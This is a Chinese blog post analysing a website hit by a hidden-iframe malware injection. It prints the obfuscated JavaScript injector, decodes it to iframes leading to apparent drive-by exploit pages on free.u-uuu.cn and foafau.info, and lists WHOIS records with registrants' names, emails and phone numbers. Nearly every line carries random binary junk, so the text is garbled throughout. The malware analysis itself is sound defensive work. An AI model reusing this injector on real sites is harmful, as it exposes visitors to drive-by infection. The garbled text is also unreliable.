首发在我的博客里面,
,"@w>WL�<9 �a;�5�6k� http://www.areway.cn/?p=175 |2q�R^Hd&5 @ L�\-Z�Wq ~@%(RM�Jm& 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
��C�}�Rs�[ �z��8g=;>< <script>t=’60,105,102,114,97,109,101,
��b��tU�q 32,115,114,99,61,104,116,116,112,58,47,47,
�;rNd701p" 102,114,101,101,46,117,45,117,117,117,46,99,
�`���!z��Q 110,47,101,114,114,111,114,46,104,116,109,
"w;�0�8TX8 32,119,105,100,116,104,61,49,48,48,32,104,
M_tj7Q3�
W 101,105,103,104,116,61,48,62,60,47,105,102,
zXQVUh�L�6 114,97,109,101,62′;
�3�|�q2rA� t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
/r>I��V`n{ e-��~hS6p( <script>t=’60,105,102,114,97,109,101,32,115,
=ZG<�BG��_ 114,99,61,104,116,116,112,58,47,47,102,114,
�t �G]N*%@ 101,101,46,117,45,117,117,117,46,99,110,47,
d0�'7efC�+ 101,114,114,111,114,46,104,116,109,32,119,
HpW"�lYW4� 105,100,116,104,61,49,48,48,32,104,101,105,
]9�fS@SHdx 103,104,116,61,48,62,60,47,105,102,114,97,
F\�;2�i:�( 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
k&��O���C& document.write(t);</script>
�Z�/xV\Ggx +z+���F�- <html xmlns=”
�(g�L��e�a http://www.w3.org/1999/xhtml s�jS��i;S4 “>
�&�8Zeq3�~ <head>
M#�ZT2~+CT <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
"Lb� �f��F <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
�1d`cTaQ�- <title>首页 - 爱生活家庭网
&xgZF�S��q 5xhM0��(�� 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
��[C~�fBf5 转换字符串后的大概内容是(谁点击后果自付):
���FU[*8^Z <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
a-f��v[o�B vxb@9�eb!H 查询玉米u-uuu.cn的详细信息:
-4��8`#"xy Domain Name: u-uuu.cn
y�a#R�II'] ROID: 20070901s10001s64972306-cn
iA]�D�E`S� Domain Status: ok
n4Vwao/9x Registrant Organization: 王雷
^Fn%K].��X Registrant Name: 王雷
Bu�&So|@TL Administrative Email:
czlovexs@126.com �[U��s�wf3 Sponsoring Registrar: 北京万网志成科技有限公司
��S[Vtq^lU Name Server:ns.yovole.com
d60c$?"]a( Name Server:ns1.yovole.com
Q�r��<AV:� Registration Date: 2007-09-01 17:54
^,Lt�Ewd~Y Expiration Date: 2008-09-01 17:54
X)��8e4~(? 最后PING了一下地址 都没有什么….
|�ribW�Cv0 L,#^&9bHa# 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
en%J!<&W{K <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
>#���I�NEO <script language=”javascript” src=”
2bkJ� /u`i http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script ;��r3}g"D@ >
tp�@*=*^�I 这个玉米应该有可能是木马作者的:
lbd(j�{h>4 foafau.info的详细信息:
�F�9%,�MSt Access to INFO WHOIS information is provided to assist persons in
: g�5(�H�H determining the contents of a domain name registration record in the
UnP|]]o:�I Afilias registry database. The data in this record is provided by
u�N8/Q2� � Afilias Limited for informational purposes only, and Afilias does not
{�� �E^U6@ guarantee its accuracy. This service is intended only for query-based
rjXnDh]MC� access. You agree that you will use this data only for lawful purposes
*�u}'}jC1X and that, under no circumstances will you use this data to: (a) allow,
3\1#eK'TK. enable, or otherwise support the transmission by e-mail, telephone, or
MB�lBMUJk� facsimile of mass unsolicited, commercial advertising or solicitations
2R����\+} to entities other than the data recipient’s own existing customers; or
7�"#�f!.�E (b) enable high volume, automated, electronic processes that send
d)\2�U���{ queries or data to the systems of Registry Operator, a Registrar, or
|88CB�iu�} Afilias except as reasonably necessary to register domain names or
W-1sU g[AN modify existing registrations. All rights reserved. Afilias reserves
���ubi~�%� the right to modify these terms at any time. By submitting this query,
;e�d#+�$Na you agree to abide by this policy.
�w;�~>k%}j Domain ID:D22418703-LRMS
J||E;=%f-Q Domain Name:FOAFAU.INFO
oooS s&t�� Created On:20-Nov-2007 16:05:42 UTC
},&h[\�N{6 Last Updated On:20-Nov-2007 16:05:44 UTC
9�976�H\{� Expiration Date:20-Nov-2008 16:05:42 UTC
.8K�6C]gw� Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
~JLYhA^'+< Status:CLIENT DELETE PROHIBITED
Z/gsC�YS3F Status:CLIENT RENEW PROHIBITED
RB� IO�dz Status:CLIENT TRANSFER PROHIBITED
lirN�YJ]tO Status:CLIENT UPDATE PROHIBITED
�!W��~QT}� Status:TRANSFER PROHIBITED
,[A�g�~.T Registrant ID:GODA-040110615
1��&��|��
Registrant Name:liu hong
EsTB(�9c?� Registrant Organization:
mzz$�`M��1 Registrant Street1:beijing
f9a$$nb�3` Registrant Street2:
>otJF3zw�� Registrant Street3:
7L���fc�F� Registrant City:beijing
iKhH�^V%j Registrant State/Province:
�fCg@FHS&^ Registrant Postal Code:100000
V3Yd&HVWNQ Registrant Country:CN
S�t�+ "ih% Registrant Phone:+86.860108888777
:G�#KB��'� Registrant Phone Ext.:
?,>5[Ha�^? Registrant FAX:
8TW5�(�f�l Registrant FAX Ext.:
"oe!M'aj`1 Registrant Email:bbbshiji@163.com
GB�=bG�%Tb Admin ID:GODA-240110615
bJwc1AJ�gH Admin Name:liu hong
`0rRKlb�j4 Admin Organization:
hXc}�r6<B Admin Street1:beijing
AX;�c}0�g� Admin Street2:
e?�P%w�q�B Admin Street3:
}��3J=DCtS Admin City:beijing
C B/r��]+4 Admin State/Province:
-x{&�a�n�= Admin Postal Code:100000
�dZD�K�7UL Admin Country:CN
b)`pZiQP�� Admin Phone:+86.860108888777
>Mw'eQ0(y Admin Phone Ext.:
�ws[�����/ Admin FAX:
7E\g
&�R.� Admin FAX Ext.:
T)�~!�mifX Admin Email:bbbshiji@163.com
\�2�>3�Opt Billing ID:GODA-340110615
#|?8~c;RWG Billing Name:liu hong
��('J�KN"3 Billing Organization:
xp^ 7#`MJ? Billing Street1:beijing
o,*=��$/or Billing Street2:
x��6v,lR�� Billing Street3:
�m�8+:=0|$ Billing City:beijing
8SZK��:VE@ Billing State/Province:
�`;��cz�;" Billing Postal Code:100000
:3��O5ET'1 Billing Country:CN
eF5;[�v�� Billing Phone:+86.860108888777
^BiP�LQ�� Billing Phone Ext.:
GyK(Vb"�h6 Billing FAX:
q/�x/N5H�U Billing FAX Ext.:
8#l+�{�`$z Billing Email:bbbshiji@163.com
/?P!.!W��& Tech ID:GODA-140110615
@vt$�M�iOi Tech Name:liu hong
~j"�3}wXc5 Tech Organization:
�,�56;4)cv Tech Street1:beijing
�WqQU@s�A Tech Street2:
l `R �KqT+ Tech Street3:
/NU103F yt Tech City:beijing
ke]Y��fw�k Tech State/Province:
�V&iS~V�0. Tech Postal Code:100000
wDKELQ(y�H Tech Country:CN
��{OP~8�e" Tech Phone:+86.860108888777
'yr{�^P�ek Tech Phone Ext.:
1q�ZG��`Vz Tech FAX:
N�O4Z"3Pd_ Tech FAX Ext.:
��O:YJ%;�w Tech Email:bbbshiji@163.com
!}t-�j3bCs Name Server:NS27.DOMAINCONTROL.COM
�V%�51�k{� Name Server:NS28.DOMAINCONTROL.COM
ISB�F\ wQY Name Server:
(:7a&2�/�M Name Server:
*�HeVA�Cxo Name Server:
S3�y246|�4 Name Server:
T�?�rH
,$: Name Server:
>
�c:�Zx�! Name Server:
�F>-}*���o Name Server:
m#n]W�gp' Name Server:
*��|K�VN&# Name Server:
�x<>YUw8�` Name Server:
M4:s;�@qZ. Name Server:
l!@ 1u^v�2 � :��,~K]G 接着下载每个文件里面的代码:
E}Y��I�WTX 一步一步看..
(f�>M &.�. 
����n[Co�S 
M*`hD��d�S 
�y/tSG�kMv 
$r15gfne�> 
F0.�z�i>�5 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
